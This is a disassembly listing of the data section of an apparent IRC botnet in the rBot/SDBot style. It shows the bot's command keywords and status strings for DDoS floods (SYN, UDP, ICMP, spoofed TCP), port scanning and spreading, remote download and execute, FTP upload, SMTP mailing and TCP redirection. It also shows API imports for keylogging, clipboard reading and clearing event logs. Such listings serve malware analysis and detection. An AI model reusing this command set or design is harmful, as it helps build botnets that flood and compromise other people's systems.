dword_4437D8 dd 234032Dh, 6E6F6C63h, 2D030265h, 646F4D20h, 25282065h
; DATA XREF: sub_401CC7+7175�o
dd 203A2973h, 7325h
; char aC_nick[]
aC_nick db 'c_nick',0 ; DATA XREF: sub_401CC7+4A83�o
align 4
; char aC_n[]
aC_n db 'c_n',0 ; DATA XREF: sub_401CC7+4A9A�o
; char aNickS_5[]
aNickS_5 db 'NICK %s',0 ; DATA XREF: sub_401CC7+7092�o
; char aS_16[]
aS_16 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+70C7�o
align 10h
; char dword_443810[]
dword_443810 dd 234032Dh, 6E6F6C63h, 2D030265h, 63694E20h, 2528206Bh
; DATA XREF: sub_401CC7+70EB�o
dd 203A2973h, 7325h
; char aC_join[]
aC_join db 'c_join',0 ; DATA XREF: sub_401CC7+4AB1�o
align 4
; char aC_j[]
aC_j db 'c_j',0 ; DATA XREF: sub_401CC7+4AC8�o
; char aJoinSS_1[]
aJoinSS_1 db 'JOIN %s %s',0 ; DATA XREF: sub_401CC7+704D�o
align 4
aS_15 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+7082�o
align 4
; char aC_part[]
aC_part db 'c_part',0 ; DATA XREF: sub_401CC7+4ADF�o
align 4
; char aC_p[]
aC_p db 'c_p',0 ; DATA XREF: sub_401CC7+4AF6�o
; char aPartS_0[]
aPartS_0 db 'PART %s',0 ; DATA XREF: sub_401CC7+6FE6�o
; char aS_14[]
aS_14 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+701B�o
align 4
; char aTarga3[]
aTarga3 db 'targa3',0 ; DATA XREF: sub_401CC7+4B0D�o
align 10h
; char aT3[]
aT3 db 't3',0 ; DATA XREF: sub_401CC7+4B24�o
align 4
; char asc_443874[]
asc_443874 db '-' ; DATA XREF: sub_401CC7+6F3E�o
db 3, 34h, 2
dd 67726174h, 3023361h
aFloodingSForSS db '- Flooding %s for %s seconds.',0
align 10h
; char asc_4438A0[]
asc_4438A0 db '-' ; DATA XREF: sub_401CC7+6FA9�o
db 3, 34h, 2
dd 67726174h, 3023361h
aFailedToStartF db '- Failed to start flood thread, error: <%d>.',0
align 4
; char aTsunami[]
aTsunami db 'tsunami',0 ; DATA XREF: sub_401CC7+4B3B�o
; char aTsn[]
aTsn db 'tsn',0 ; DATA XREF: sub_401CC7+4B52�o
; char asc_4438E8[]
asc_4438E8 db '-' ; DATA XREF: sub_401CC7+6E69�o
db 3, 34h, 2
db 74h ; t
db 73h, 75h, 6Eh
db 61h ; a
db 6Dh, 69h, 2
db 3
aTsunamiHeading db '- Tsunami heading for %s (%s seconds).',0
unk_44391C db 2Dh ; - ; DATA XREF: sub_401CC7+6ED8�o
db 3, 34h, 2
db 74h ; t
db 73h, 75h, 6Eh
db 61h ; a
db 6Dh, 69h, 2
db 3
aFailedToSta_17 db '- Failed to start flood thread, error: <%d>.',0
align 4
; char aRepeat[]
aRepeat db 'repeat',0 ; DATA XREF: sub_401CC7+4B69�o
align 10h
; char aRp[]
aRp db 'rp',0 ; DATA XREF: sub_401CC7+4B80�o
align 4
; char a332_1[]
a332_1 db '332',0 ; DATA XREF: sub_401CC7+6D0E�o
; char aRepeat_0[]
aRepeat_0 db 'repeat',0 ; DATA XREF: sub_401CC7+6D3C�o
align 10h
; char aSSSS_0[]
aSSSS_0 db '%s %s %s :%s',0 ; DATA XREF: sub_401CC7+6D67�o
align 10h
; char asc_443980[]
asc_443980 db '-' ; DATA XREF: sub_401CC7+6D90�o
db 3, 34h, 2
dd 6E69616Dh, 202D0302h, 65706552h, 203A7461h, 7325h
; char asc_443998[]
asc_443998 db '-' ; DATA XREF: sub_401CC7:loc_408A8E�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aRepeatNotAllow db 'Repeat not allowed in command line: %s',0
align 4
; char aDelay[]
aDelay db 'delay',0 ; DATA XREF: sub_401CC7+4B97�o
align 4
; char aDe[]
aDe db 'de',0 ; DATA XREF: sub_401CC7+4BAE�o
align 4
; char a332_0[]
a332_0 db '332',0 ; DATA XREF: sub_401CC7+6C71�o
; char aSSSS[]
aSSSS db '%s %s %s :%s',0 ; DATA XREF: sub_401CC7+6CB4�o
align 4
dword_4439EC dd 234032Dh, 6E69616Dh, 202D0302h, 616C6544h, 2E79h
; DATA XREF: sub_401CC7:loc_4089BB�o
; char aUpdate[]
aUpdate db 'update',0 ; DATA XREF: sub_401CC7+4BC5�o
align 4
; char aUp_0[]
aUp_0 db 'up',0 ; DATA XREF: sub_401CC7+4BDC�o
align 4
; char aSS_exe[]
aSS_exe db '%s%s.exe',0 ; DATA XREF: sub_401CC7+6B34�o
align 4
; char asc_443A18[]
asc_443A18 db '-' ; DATA XREF: sub_401CC7+6BDA�o
db 3, 34h, 2
dd 61647075h, 3026574h
aDownloadingUpd db '- Downloading update from: %s.',0
align 4
dword_443A44 dd 234032Dh, 61647075h, 3026574h ; DATA XREF: sub_401CC7+6C49�o
aFailedToStartD db '- Failed to start download thread, error: <%d>.',0
; char asc_443A80[]
asc_443A80 db '-' ; DATA XREF: sub_401CC7:loc_40891A�o
db 3, 34h, 2
dd 61647075h, 3026574h
aBotIdMustBeDif db '- Bot ID must be different than current running process.',0
align 4
; char aExecute[]
aExecute db 'execute',0 ; DATA XREF: sub_401CC7+4BF3�o
; char aE[]
aE: ; DATA XREF: sub_401CC7+4C0A�o
unicode 0, <e>,0
unk_443AD4 db 2Dh ; - ; DATA XREF: sub_401CC7+6AC7�o
db 3, 34h, 2
db 65h ; e
db 78h, 65h, 63h
db 2
db 3, 2Dh, 20h
aCouldnTExecute db 'Couldn',27h,'t execute file.',0
align 4
dword_443AF8 dd 234032Dh, 63657865h, 202D0302h, 6D6D6F43h, 73646E61h
; DATA XREF: sub_401CC7+6AD2�o
dd 7325203Ah, 0
; char aFindfile[]
aFindfile db 'findfile',0 ; DATA XREF: sub_401CC7+4C21�o
align 10h
; char aFf[]
aFf db 'ff',0 ; DATA XREF: sub_401CC7+4C38�o
align 4
; char asc_443B24[]
asc_443B24 db '-' ; DATA XREF: sub_401CC7+69B7�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 66h ; f
db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aSearchingForFi db 'Searching for file: %s in: %s.',0
align 4
; char asc_443B54[]
asc_443B54 db '-' ; DATA XREF: sub_401CC7+6A2D�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 66h ; f
db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aFailedToSta_18 db 'Failed to start search thread, error: <%d>.',0
; char aRename[]
aRename db 'rename',0 ; DATA XREF: sub_401CC7+4C4F�o
align 4
; char aMv[]
aMv db 'mv',0 ; DATA XREF: sub_401CC7+4C66�o
align 4
; char asc_443B9C[]
asc_443B9C db '-' ; DATA XREF: sub_401CC7+68DB�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aRenameSToS_ db 'Rename: ',27h,'%s',27h,' to: ',27h,'%s',27h,'.',0
align 10h
dword_443BC0 dd 234032Dh, 656C6966h, 2D0302h ; DATA XREF: sub_401CC7:loc_4085B7�o
; char aIcmpflood[]
aIcmpflood db 'icmpflood',0 ; DATA XREF: sub_401CC7+4C7D�o
align 4
; char aIcmp[]
aIcmp db 'icmp',0 ; DATA XREF: sub_401CC7+4C94�o
align 10h
; char asc_443BE0[]
asc_443BE0 db '-' ; DATA XREF: sub_401CC7+683F�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aFloodingSFor_0 db 'Flooding: (%s) for %s seconds.',0
align 4
unk_443C0C db 2Dh ; - ; DATA XREF: sub_401CC7+68AF�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aFailedToSta_19 db 'Failed to start flood thread, error: <%d>.',0
align 4
unk_443C44 db 2Dh ; - ; DATA XREF: sub_401CC7:loc_408580�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aInvalidFloodTi db 'Invalid flood time must be greater than 0.',0
align 4
; char aClone_0[]
aClone_0 db 'clone',0 ; DATA XREF: sub_401CC7+4CBD�o
align 4
; char aC[]
aC: ; DATA XREF: sub_401CC7+4CD4�o
unicode 0, <c>,0
; char asc_443C88[]
asc_443C88 db '-' ; DATA XREF: sub_401CC7+674D�o
db 3, 34h, 2
dd 6E6F6C63h, 3027365h
aCreatedOnSDInC db '- Created on %s:%d, in channel %s.',0
align 4
dword_443CB8 dd 234032Dh, 6E6F6C63h, 3027365h ; DATA XREF: sub_401CC7+67BC�o
aFailedToSta_20 db '- Failed to start clone thread, error: <%d>.',0
align 4
; char aDdos_syn[]
aDdos_syn db 'ddos.syn',0 ; DATA XREF: sub_401CC7+4CEB�o
align 10h
; char aDdos_ack[]
aDdos_ack db 'ddos.ack',0 ; DATA XREF: sub_401CC7+4D02�o
align 4
; char aDdos_random[]
aDdos_random db 'ddos.random',0 ; DATA XREF: sub_401CC7+4D19�o
; char asc_443D18[]
asc_443D18 db '-' ; DATA XREF: sub_401CC7+6665�o
db 3, 34h, 2
db 64h ; d
db 64h, 6Fh, 73h
db 2
db 3, 2Dh, 20h
aFloodingSSForS db 'Flooding: (%s:%s) for %s seconds.',0
align 4
unk_443D48 db 2Dh ; - ; DATA XREF: sub_401CC7+66D4�o
db 3, 34h, 2
db 64h ; d
db 64h, 6Fh, 73h
db 2
db 3, 2Dh, 20h
aFailedToSta_21 db 'Failed to start flood thread, error: <%d>.',0
align 10h
; char aWisdom_udp[]
aWisdom_udp db 'wisdom.udp',0 ; DATA XREF: sub_401CC7+4D30�o
align 4
unk_443D8C db 2Dh ; - ; DATA XREF: sub_401CC7+4E07�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aFailedToSta_22 db '- Failed to start flood thread, error: <%d>.',0
align 4
; char aSynflood[]
aSynflood db 'synflood',0 ; DATA XREF: sub_401CC7+4E14�o
align 4
; char aSyn[]
aSyn db 'syn',0 ; DATA XREF: sub_401CC7+4E2B�o
; char asc_443DDC[]
asc_443DDC db '-' ; DATA XREF: sub_401CC7+656C�o
db 3, 34h, 2
db 73h ; s
db 79h, 6Eh, 2
db 3
aFloodingSSFo_0 db '- Flooding: (%s:%s) for %s seconds.',0
align 4
unk_443E0C db 2Dh ; - ; DATA XREF: sub_401CC7+65DB�o
db 3, 34h, 2
db 73h ; s
db 79h, 6Eh, 2
db 3
aFailedToSta_23 db '- Failed to start flood thread, error: <%d>.',0
align 4
; char aSkysyn[]
aSkysyn db 'skysyn',0 ; DATA XREF: sub_401CC7+4E42�o
align 4
; char asc_443E4C[]
asc_443E4C db '-' ; DATA XREF: sub_401CC7+4EC5�o
db 3, 34h, 2
dd 73796B73h, 3026E79h
aFloodingSSFo_1 db '- Flooding: (%s:%s) for %s seconds.',0
dword_443E7C dd 234032Dh, 73796B73h, 3026E79h ; DATA XREF: sub_401CC7+4F34�o
aFailedToSta_24 db '- Failed to start flood thread, error: <%d>.',0
align 4
; char aPhatwonk[]
aPhatwonk db 'phatwonk',0 ; DATA XREF: sub_401CC7+4F41�o
align 4
; char aWonk[]
aWonk db 'wonk',0 ; DATA XREF: sub_401CC7+4F58�o
align 4
; char asc_443ECC[]
asc_443ECC db '-' ; DATA XREF: sub_401CC7+6484�o
db 3, 34h, 2
db 77h ; w
db 6Fh, 6Eh, 6Bh
db 2
db 3, 2Dh, 20h
aFloodingSFor_1 db 'Flooding %s for %s seconds using delay %s ms.',0
align 4
unk_443F08 db 2Dh ; - ; DATA XREF: sub_401CC7+64F3�o
db 3, 34h, 2
db 77h ; w
db 6Fh, 6Eh, 6Bh
db 2
db 3, 2Dh, 20h
aFailedToSta_25 db 'Failed to start flood thread, error: <%d>.',0
align 10h
; char aDownload[]
aDownload db 'download',0 ; DATA XREF: sub_401CC7+4F6F�o
align 4
; char aDl[]
aDl db 'dl',0 ; DATA XREF: sub_401CC7+4F86�o
align 10h
; char asc_443F50[]
asc_443F50 db '-' ; DATA XREF: sub_401CC7+639C�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aDownloadingUrl db 'Downloading URL: %s to: %s.',0
unk_443F7C db 2Dh ; - ; DATA XREF: sub_401CC7+640B�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aFailedToSta_26 db 'Failed to start transfer thread, error: <%d>.',0
align 4
; char aRedirect[]
aRedirect db 'redirect',0 ; DATA XREF: sub_401CC7+4F9D�o
align 4
; char aRd[]
aRd db 'rd',0 ; DATA XREF: sub_401CC7+4FB4�o
align 4
; char asc_443FCC[]
asc_443FCC db '-' ; DATA XREF: sub_401CC7+625E�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2
db 3, 2Dh, 20h
aTcpRedirectCre db 'TCP redirect created from: %s:%d to: %s:%d.',0
unk_444008 db 2Dh ; - ; DATA XREF: sub_401CC7+62CD�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2
db 3, 2Dh, 20h
aFailedToStartR db 'Failed to start redirection thread, error: <%d>.',0
align 4
; char aScan_2[]
aScan_2 db 'scan',0 ; DATA XREF: sub_401CC7+4FCB�o
align 4
; char aSc[]
aSc db 'sc',0 ; DATA XREF: sub_401CC7+4FE2�o
align 4
; char asc_444058[]
asc_444058 db '-' ; DATA XREF: sub_401CC7+6161�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aPortScanStarte db 'Port scan started: %s:%d with delay: %d(ms).',0
align 4
unk_444094 db 2Dh ; - ; DATA XREF: sub_401CC7+61D0�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToSta_27 db 'Failed to start scan thread, error: <%d>.',0
align 4
; char aC_privmsg[]
aC_privmsg db 'c_privmsg',0 ; DATA XREF: sub_401CC7+4FF9�o
align 4
; char aC_pm[]
aC_pm db 'c_pm',0 ; DATA XREF: sub_401CC7+5010�o
align 10h
; char aSSS_0[]
aSSS_0 db '[%s] <%s> %s',0 ; DATA XREF: sub_401CC7+60B5�o
align 10h
; char aC_action[]
aC_action db 'c_action',0 ; DATA XREF: sub_401CC7+5027�o
align 4
; char aC_a[]
aC_a db 'c_a',0 ; DATA XREF: sub_401CC7+503E�o
; char dword_444100
dword_444100 dd 54434101h, 204E4F49h, 17325h ; DATA XREF: sub_401CC7+5F52�o
aSSS db '[%s] * %s %s',0 ; DATA XREF: sub_401CC7+5FE0�o
align 4
; char aPortscan[]
aPortscan db 'portscan',0 ; DATA XREF: sub_401CC7+5064�o
align 4
; char aPsc[]
aPsc db 'psc',0 ; DATA XREF: sub_401CC7+507B�o
; char asc_44412C[]
asc_44412C db '-' ; DATA XREF: sub_401CC7+5E81�o
db 3, 34h, 2
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aPortScanStar_0 db 'Port scan started: %s with delay: %d(ms) checking range %d-%d.',0
align 4
unk_44417C db 2Dh ; - ; DATA XREF: sub_401CC7+5EF0�o
db 3, 34h, 2
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToSta_28 db 'Failed to start scan thread, error: <%d>.',0
align 4
; char aAdvscan[]
aAdvscan db 'advscan',0 ; DATA XREF: sub_401CC7+5092�o
; char aAsc[]
aAsc db 'asc',0 ; DATA XREF: sub_401CC7+50A9�o
; char asc_4441C4[]
asc_4441C4 db '-' ; DATA XREF: sub_401CC7+5944�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aAlreadyDScan_0 db 'Already %d scanning threads. Too many specified.',0
align 4
unk_444204 db 2Dh ; - ; DATA XREF: sub_401CC7+5BA8�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToSta_29 db 'Failed to start scan, port is invalid.',0
align 4
unk_444238 db 2Dh ; - ; DATA XREF: sub_401CC7+5C05�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToSta_30 db 'Failed to start scan, no IP specified.',0
align 4
aRandom_1 db 'Random',0 ; DATA XREF: sub_401CC7+5D49�o
align 4
aSequential_0 db 'Sequential',0 ; DATA XREF: sub_401CC7+5D50�o
align 10h
; char asc_444280[]
asc_444280 db '-' ; DATA XREF: sub_401CC7+5D7B�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aSPortScanSta_0 db '%s Port Scan started on %s:%d with a delay of %d seconds for %d m'
db 'inutes using %d threads.',0
align 4
unk_4442E8 db 2Dh ; - ; DATA XREF: sub_401CC7+5DEA�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToSta_31 db 'Failed to start scan thread, error: <%d>.',0
align 10h
; char aUdpflood[]
aUdpflood db 'udpflood',0 ; DATA XREF: sub_401CC7+50C0�o
align 4
; char aUdp[]
aUdp db 'udp',0 ; DATA XREF: sub_401CC7+50D7�o
; char aU[]
aU: ; DATA XREF: sub_401CC7+50EE�o
unicode 0, <u>,0
; char asc_444334[]
asc_444334 db '-' ; DATA XREF: sub_401CC7+587A�o
db 3, 34h, 2
db 75h ; u
db 64h, 70h, 2
db 3
aSendingDPacket db '- Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).',0
align 4
; char asc_44437C[]
asc_44437C db '-' ; DATA XREF: sub_401CC7+58E5�o
db 3, 34h, 2
db 75h ; u
db 64h, 70h, 2
db 3
aFailedToSta_32 db '- Failed to start flood thread, error: <%d>.',0
align 4
; char aNetsend[]
aNetsend db 'netsend',0 ; DATA XREF: sub_401CC7+5105�o
; char aNs[]
aNs db 'ns',0 ; DATA XREF: sub_401CC7+511C�o
align 10h
; char asc_4443C0[]
asc_4443C0 db '-' ; DATA XREF: sub_401CC7+56CF�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 73h
db 65h ; e
db 6Eh, 64h, 2
db 3
aSendingMessage db '- Sending message %s times to %s using name %s',0
unk_4443FC db 2Dh ; - ; DATA XREF: sub_401CC7+5771�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 73h
db 65h ; e
db 6Eh, 64h, 2
db 3
aNetsendDoesNot db '- NetSend does not work on Win9x systems',0
align 4
; char asc_444434[]
asc_444434 db '-' ; DATA XREF: sub_401CC7+5795�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 73h
db 65h ; e
db 6Eh, 64h, 2
db 3
aFailedToSendMe db '- Failed to send message, error <%i>.',0
align 4
unk_444468 db 2Dh ; - ; DATA XREF: sub_401CC7+57C9�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 73h
db 65h ; e
db 6Eh, 64h, 2
db 3
aMessageHasBeen db '- Message has been sent successfuly',0
align 4
; char aPingflood[]
aPingflood db 'pingflood',0 ; DATA XREF: sub_401CC7+5133�o
align 4
; char aPing_0[]
aPing_0 db 'ping',0 ; DATA XREF: sub_401CC7+514A�o
align 10h
; char aP[]
aP: ; DATA XREF: sub_401CC7+5161�o
unicode 0, <p>,0
; char asc_4444B4[]
asc_4444B4 db '-' ; DATA XREF: sub_401CC7+562E�o
db 3, 34h, 2
db 70h ; p
db 69h, 6Eh, 67h
db 2
db 3, 2Dh, 20h
aSendingDPingsT db 'Sending %d pings to %s. packet size: %d, timeout: %d(ms).',0
align 4
unk_4444FC db 2Dh ; - ; DATA XREF: sub_401CC7+569D�o
db 3, 34h, 2
db 70h ; p
db 69h, 6Eh, 67h
db 2
db 3, 2Dh, 20h
aFailedToSta_33 db 'Failed to start flood thread, error: <%d>.',0
align 4
; char aIcmp_dllNotAva[]
aIcmp_dllNotAva db 'ICMP.dll not available',0 ; DATA XREF: sub_401CC7+56B2�o
align 4
; char aVnchost[]
aVnchost db 'vnchost',0 ; DATA XREF: sub_401CC7+5178�o
; char aVncHttpHostCha[]
aVncHttpHostCha db 'VNC: HTTP Host Changed To: %s',0 ; DATA XREF: sub_401CC7+5196�o
align 4
; char aTcpflood[]
aTcpflood db 'tcpflood',0 ; DATA XREF: sub_401CC7+51C0�o
align 10h
; char aTcp[]
aTcp db 'tcp',0 ; DATA XREF: sub_401CC7+51D7�o
; char aSyn_0[]
aSyn_0 db 'syn',0 ; DATA XREF: sub_401CC7+540B�o
; char aAck[]
aAck db 'ack',0 ; DATA XREF: sub_401CC7+5423�o
; char aRandom_0[]
aRandom_0 db 'random',0 ; DATA XREF: sub_401CC7+543A�o
align 4
aSpoofed db 'Spoofed',0 ; DATA XREF: sub_401CC7+54E5�o
aNormal db 'Normal',0 ; DATA XREF: sub_401CC7+54EC�o
align 4
; char asc_4445A4[]
asc_4445A4 db '-' ; DATA XREF: sub_401CC7+54FC�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aSSFloodingSSFo db '- %s %s flooding: (%s:%s) for %s seconds.',0
align 4
unk_4445D8 db 2Dh ; - ; DATA XREF: sub_401CC7+5576�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aFailedToSta_34 db '- Failed to start flood thread, error: <%d>.',0
align 10h
; char asc_444610[]
asc_444610 db '-' ; DATA XREF: sub_401CC7:loc_407247�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aInvalidFlood_0 db '- Invalid flood time must be greater than 0.',0
align 4
unk_444648 db 2Dh ; - ; DATA XREF: sub_401CC7+544A�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aInvalidFloodTy db '- Invalid flood type specified.',0
align 4
; char aEmail[]
aEmail db 'email',0 ; DATA XREF: sub_401CC7+51EE�o
align 4
; char asc_44467C[]
asc_44467C: ; DATA XREF: sub_401CC7+5238�o
unicode 0, < >,0
; char a__1[]
a__1: ; DATA XREF: sub_401CC7+523D�o
unicode 0, <_>,0
; char aHeloRndnickMai[]
aHeloRndnickMai db 'helo $rndnick',0Ah ; DATA XREF: sub_401CC7+52D9�o
db 'mail from: <%s>',0Ah
db 'rcpt to: <%s>',0Ah
db 'data',0Ah
db 'subject: %s',0Ah
db 'from: %s',0Ah
db '%s',0Ah
db '.',0Ah,0
; char asc_4446D0[]
asc_4446D0 db '-' ; DATA XREF: sub_401CC7+534D�o
db 3, 34h, 2
db 65h ; e
db 6Dh, 61h, 69h
db 6Ch ; l
db 2, 3, 2Dh
aMessageSentToS db ' Message sent to %s.',0
align 4
; char aHttpcon[]
aHttpcon db 'httpcon',0 ; DATA XREF: sub_401CC7+539C�o
; char aHcon[]
aHcon db 'hcon',0 ; DATA XREF: sub_401CC7+53AF�o
align 4
; char aUpload[]
aUpload db 'upload',0 ; DATA XREF: sub_401CC7+597A�o
align 4
; char asc_44470C[]
asc_44470C db '-' ; DATA XREF: sub_401CC7+599D�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 2
db 3
aFileNotFoundS_ db '- File not found: %s.',0
align 4
; char aSIII_dll[]
aSIII_dll db '%s\%i%i%i.dll',0 ; DATA XREF: sub_401CC7+59F6�o
align 4
; char Mode[]
Mode db 'ab',0 ; DATA XREF: sub_401CC7+5A07�o
align 10h
; char aOpenSSSSPutSBy[]
aOpenSSSSPutSBy db 'open %s',0Dh,0Ah ; DATA XREF: sub_401CC7+5A2B�o
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'put %s',0Dh,0Ah
db 'bye',0Dh,0Ah,0
align 4
; char aSS_2[]
aSS_2 db '-s:%s',0 ; DATA XREF: sub_401CC7+5A4E�o
align 4
aFtp_exe db 'ftp.exe',0 ; DATA XREF: sub_401CC7+5A65�o
aOpen_0 db 'open',0 ; DATA XREF: sub_401CC7+5A6A�o
align 4
unk_44477C db 2Dh ; - ; DATA XREF: sub_401CC7+5A7C�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 2
db 3
aUploadingFileS db '- Uploading file: %s to: %s',0
align 4
; char asc_4447A4[]
asc_4447A4 db '-' ; DATA XREF: sub_401CC7:loc_40774A�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 2
db 3
aUploadingFil_0 db '- Uploading file: %s to: %s failed.',0
align 4
; char aNotice_3[]
aNotice_3 db 'NOTICE',0 ; DATA XREF: sub_409D6C+F�o
align 4
aPrivmsg_2 db 'PRIVMSG',0 ; DATA XREF: sub_409D6C+16�o
; char aS_21[]
aS_21 db '%s',0 ; DATA XREF: sub_409D6C+3D�o
align 4
; char aSSS_1[]
aSSS_1 db '%s %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_409D6C+5D�o
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_409E0C+A�o
align 4
aSeterrormode db 'SetErrorMode',0 ; DATA XREF: sub_409E0C+23�o
align 4
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_409E0C+2B�o
align 10h
aProcess32first db 'Process32First',0 ; DATA XREF: sub_409E0C+38�o
align 10h
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_409E0C+45�o
align 10h
aModule32first db 'Module32First',0 ; DATA XREF: sub_409E0C+52�o
align 10h
aGetdiskfreespa db 'GetDiskFreeSpaceExA',0 ; DATA XREF: sub_409E0C+5F�o
aGetlogicaldriv db 'GetLogicalDriveStringsA',0 ; DATA XREF: sub_409E0C+6C�o
aGetdrivetypea db 'GetDriveTypeA',0 ; DATA XREF: sub_409E0C+79�o
align 4
aSearchpatha db 'SearchPathA',0 ; DATA XREF: sub_409E0C+86�o
aQueryperforman db 'QueryPerformanceCounter',0 ; DATA XREF: sub_409E0C+93�o
aQueryperform_0 db 'QueryPerformanceFrequency',0 ; DATA XREF: sub_409E0C+A0�o
align 4
aRegisterservic db 'RegisterServiceProcess',0 ; DATA XREF: sub_409E0C:loc_409F14�o
align 4
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_409E0C:loc_409F41�o
align 10h
aSendmessagea db 'SendMessageA',0 ; DATA XREF: sub_409E0C+14A�o
align 10h
aFindwindowa db 'FindWindowA',0 ; DATA XREF: sub_409E0C+152�o
aIswindow db 'IsWindow',0 ; DATA XREF: sub_409E0C+15F�o
align 4
aDestroywindow db 'DestroyWindow',0 ; DATA XREF: sub_409E0C+16C�o
align 4
aOpenclipboard db 'OpenClipboard',0 ; DATA XREF: sub_409E0C+179�o
align 4
aGetclipboardda db 'GetClipboardData',0 ; DATA XREF: sub_409E0C+186�o
align 4
aCloseclipboard db 'CloseClipboard',0 ; DATA XREF: sub_409E0C+193�o
align 4
aExitwindowsex db 'ExitWindowsEx',0 ; DATA XREF: sub_409E0C+1A0�o
align 4
aGetasynckeysta db 'GetAsyncKeyState',0 ; DATA XREF: sub_409E0C:loc_40A004�o
align 10h
aGetkeystate db 'GetKeyState',0 ; DATA XREF: sub_409E0C+200�o
aGetwindowtexta db 'GetWindowTextA',0 ; DATA XREF: sub_409E0C+20D�o
align 4
aGetforegroundw db 'GetForegroundWindow',0 ; DATA XREF: sub_409E0C+21A�o
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: sub_409E0C:loc_40A06B�o
align 10h
aRegopenkeyexa db 'RegOpenKeyExA',0 ; DATA XREF: sub_409E0C+270�o
align 10h
aRegcreatekeyex db 'RegCreateKeyExA',0 ; DATA XREF: sub_409E0C+278�o
aRegsetvalueexa db 'RegSetValueExA',0 ; DATA XREF: sub_409E0C+285�o
align 10h
aRegqueryvaluee db 'RegQueryValueExA',0 ; DATA XREF: sub_409E0C+292�o
align 4
aRegdeletevalue db 'RegDeleteValueA',0 ; DATA XREF: sub_409E0C+29F�o
aRegclosekey db 'RegCloseKey',0 ; DATA XREF: sub_409E0C+2AC�o
aOpeneventloga db 'OpenEventLogA',0 ; DATA XREF: sub_409E0C+2B9�o
align 10h
aCleareventloga db 'ClearEventLogA',0 ; DATA XREF: sub_409E0C+2C6�o
align 10h
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_409E0C:loc_40A11E�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_409E0C+31A�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_409E0C+327�o
align 4
aOpenscmanagera db 'OpenSCManagerA',0 ; DATA XREF: sub_409E0C:loc_40A163�o
align 4
aOpenservicea db 'OpenServiceA',0 ; DATA XREF: sub_409E0C+35F�o
align 4
aStartservicea db 'StartServiceA',0 ; DATA XREF: sub_409E0C+36C�o
align 4
aControlservice db 'ControlService',0 ; DATA XREF: sub_409E0C+379�o
align 4
aDeleteservice db 'DeleteService',0 ; DATA XREF: sub_409E0C+386�o
align 4
aCloseserviceha db 'CloseServiceHandle',0 ; DATA XREF: sub_409E0C+393�o
align 4
aEnumservicesst db 'EnumServicesStatusA',0 ; DATA XREF: sub_409E0C+3A0�o
aIsvalidsecurit db 'IsValidSecurityDescriptor',0 ; DATA XREF: sub_409E0C+3AD�o
align 4
